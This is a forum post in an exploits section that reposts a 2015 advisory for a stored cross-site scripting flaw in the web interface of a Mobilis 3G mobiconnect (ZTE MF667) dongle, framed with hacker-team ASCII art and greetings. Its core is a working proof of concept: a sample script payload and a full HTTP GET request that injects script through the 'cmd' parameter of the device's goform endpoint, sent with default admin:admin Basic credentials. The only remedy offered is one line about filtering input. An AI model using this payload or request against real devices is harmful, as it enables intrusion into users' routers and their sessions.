Jump to content
Aerosol

Mobilis 3g Cross Site Scripting

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

###########################
#Exploit Title: # Mobilis 3g mobiconnect 3G++ Stored XSS vulnerability
#Date: 07/01/2015
#Author: kabanni kacily2008@gmail.com
#Product web page: http://www.3G.dz/   http://www.mobilis.dz/
#Version Of software WEB_MOBILISDZMF667V1.0.0B03 
#Version The firmware BD_HDW5MF667V1.0.0B01
#Version Equipment MF667-2.0.0
#Product & Service Introduction:
  http://www.zte.com.cn
  http://www.mobilis.dz/entreprises/mobiconnect.php
  http://www.3g.dz/fr/cle_mas/index.php?id_document=2
#Tested on:  WifiSlax  (Es)
###########################
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1                      ______                                          0
0                   .-"      "-.                                       1
1                  / HaChkerz_Dz  \ =-=-=-=-=-=-=-=-=-=-=-=|           0
0 Algerian HaCker |              | > Site : GDGBordj.org |             1
1 --------------- |,  .-.  .-.  ,| > fb : @kabanni       |             0
0                 | )(_o/  \o_)( | > [email]kacily2008@gmail.com[/email]|             1
1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=-|             0
0       (@_       (_     ^^     _)  0X00 Team                          1
1  _     ) \_______\__|IIIIII|__/_______________________               0
0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1
1        )_/        \          /                                       0
0       (@           `--------`   2015, 0x00 Team                      1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0     Mobilis 3g mobiconnect 3G++ XSS vulnerability                    1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
##########################
# Sample Payload for Stored XSS: "<script>alert(0);</script> "

# Solution
Filter the input fields aganist to XSS attacks.

# code :
 GET /goform/goform_get_cmd_process?cmd=%3Cscript%3Ealert%28%27happy%20new%20year%27%29%3C/script%3E HTTP/1.1

Host: 192.168.0.1 Or [url]http://m.home[/url]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ls_google_allow=1; ls_iserver_timestamp_bnc_bsaved=1414677822551; ctx1420m06d05=7b2273756363657777723a302c226c6f675f616374697665223a307d
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive

# Attack details :
The variable cmd  has been set to simple payload <script>alert('happy new year')</script>

    --==[[ Greetz To ]]==--
############################################################################################
#0x00 , Alhack , Mr.elhdj Google , Hakim_Ghorb , Mohamed Ramaden , Team Anonymous .
#Mr.Zaki ,Dr.Ben Taleb,unKnown ,Dahmani,Good_person ,Boud_Sah ,Moh_Dz ,Yass_assasine.
#Amin-Biskra , Bouhlel ,Mr.Control, Najmo & All students TIC & Informatics at Msila_Msila

#############################################################################################

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...